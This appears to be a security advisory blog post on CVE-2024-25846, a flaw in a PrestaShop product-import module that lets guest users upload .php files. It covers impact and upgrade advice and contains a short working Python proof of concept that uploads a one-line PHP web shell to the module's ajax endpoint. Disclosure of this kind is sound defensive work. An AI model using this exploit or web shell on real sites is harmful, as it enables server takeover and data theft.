TL;DR: A critical vulnerability in the "Product Catalog (CSV, Excel) Import" module (simpleimportproduct) versions <= 6.7. by MyPrestaModules for PrestaShop allows guest users to upload .php files, potentially leading to remote code execution. If you are using the affected module, it is highly recommended to upgrade it to the latest version as soon as possible.

In this blog post, we will dive deep into the details of the CVE-2024-25846 vulnerability in the "Product Catalog (CSV, Excel) Import" (simpleimportproduct) module for PrestaShop by MyPrestaModules. The vulnerability allows unauthorized guest users to upload .php files, which may lead to potential remote code execution.

Vulnerability Details

In versions <= 6.7. of the "Product Catalog (CSV, Excel) Import" module by MyPrestaModules, the file upload function does not properly verify the type of uploaded files. Instead, it allows unauthorized guest users to upload .php files, which can potentially result in remote code execution. This vulnerability has been assigned the CVE ID CVE-2024-25846.

Proof-of-Concept Exploit

Here, we present a brief code snippet demonstrating how one can exploit this vulnerability.

import requests

url = "http://TARGET-PRESTASHOP-SITE.com/modules/simpleimportproduct/ajax.php";
file = {'file_import': ('webshell.php', '<?php echo shell_exec($_GET["cmd"]); ?>', 'application/x-php')}

payload = {
    'action': 'upload',
    'ajax': '1'
}

response = requests.post(url, headers={'User-Agent': 'Mozilla/5.'}, files=file, data=payload)

if response:
    print("File uploaded successfully!")
else:
    print("Failed to upload the file.")

By replacing TARGET-PRESTASHOP-SITE with the actual URL of the target's PrestaShop website and running the code snippet, an attacker can inject a malicious PHP file (webshell.php, in this example) on the target's server.

The Impact of the Vulnerability

This vulnerability poses a significant risk to PrestaShop websites using the affected versions of the "Product Catalog (CSV, Excel) Import" module. Unauthorized guest users may exploit the vulnerability to upload .php files, which can provide them with unauthorized access to the victim's server, executing malicious scripts, stealing sensitive data, or potentially compromising the entire web application.

Solution

MyPrestaModules has released an update to address this vulnerability. It is highly recommended for all PrestaShop website owners using the "Product Catalog (CSV, Excel) Import" module to upgrade immediately to version 6.7.1 or later. You can download the latest version of the module from MyPrestaModules' website.

Additionally, you should check your website's server and logs for any suspicious activity or uploaded .php files. If you find any suspicious files, you should remove them as soon as possible and investigate further for potential security breaches. It is also a good practice to enforce proper access control mechanisms in your web application to prevent unauthorized guest users from performing sensitive actions like file uploads. Implementing a robust security policy and keeping your web applications and modules up to date will also help you minimize the chances of exploitations of such vulnerabilities in the future.

Original References

1. PrestaShop Module - Product Catalog (CSV, Excel) Import: https://myprestamodules.com/downloads/simpleimportproduct/
2. CVE-2024-25846 Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25846

Timeline

Published on: 02/27/2024 17:15:12 UTC
Last modified on: 08/08/2024 20:35:05 UTC